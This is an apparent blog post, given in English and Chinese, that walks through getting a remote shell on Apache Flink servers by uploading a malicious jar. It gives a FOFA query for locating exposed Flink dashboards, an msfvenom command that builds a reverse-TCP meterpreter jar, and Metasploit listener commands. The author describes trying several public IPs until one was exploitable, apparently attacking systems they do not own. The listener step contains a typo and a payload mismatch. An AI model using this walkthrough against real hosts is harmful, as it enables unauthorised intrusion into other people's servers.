Apache-Flink RCE Reproduction/Apache-Flink RCE复现

This article is written in Chinese and English, and the content is exactly the same. To view the Chinese version, please scroll down.

本篇文章采用中文和英文两种语言编写,内容完全相同。如需查看中文版请下滑。

Condition

I saw a vulnerability in the upload arbitrary jar package of Apache Flink in Exploit DB. The impact range is <= 1.9.1, and it is currently the latest version. But in the actual test, the vulnerability was successfully reproduced in the 1.12.1 version.

Reproduction

The approximate process of recurrence is to directly upload a jar Trojan horse and rebound the shell to its own server.

First, I use FOFA to find the IP address using apache-flink on the public Internet, the port is 8081, and the search syntax 1 is as follows

1
app="Apache-Flink"

Many of the apache flinks do not open the function of uploading jar packages, and some incorrectly configured upload functions will also cause incorrect uploads. After tried about 4 or 5 IPs, I finally found an IP that was set up correctly.

First use msfvenom to generate a Trojan

1
msfvenom -p java/meterpreter/reverse_tcp LHOST=yourIP LPORT=port -f jar> testone.jar

Click Submit New Job, select Add New to upload the generated jar file.

Before clicking submit, listen for the returned shell on the server.

1
2
3
4
5
use exploit/multi/handler
ser payload java/shell/reverse_tcp
set lhost yourIP
set lport port
run

Click submit to receive the shell.

前言

在知识星球里看到了Apache Flink的任意jar包上传的漏洞,影响范围 <= 1.9.1,目前是最新的版本。但是在实际测试用成功在1.12.1版本中复现了改漏洞。

复现

复现的大概流程就是直接上传一个jar木马,反弹shell到自己的服务器。

首先我使用FOFA在公网上找到使用apache-flink的IP地址,端口为8081,搜索语法1如下

1
app="Apache-Flink"

其中很多的apache flink没有开放上传jar包的功能,有些没有正确配置上传功能也会导致上传不正确。在大概找了4,5个ip之后终于找到了一个一切正常的ip。

首先使用msfvenom生成一个木马

1
msfvenom -p java/meterpreter/reverse_tcp LHOST=yourIP LPORT=port -f jar > testone.jar

点击Submit New Job,选择Add New将生成的jar文件上传。

在点击submit之前,在服务器上监听回传的shell。

1
2
3
4
5
use exploit/multi/handler
ser payload java/shell/reverse_tcp
set lhost yourIP
set lport port
run

点击submit,就可以收到shell。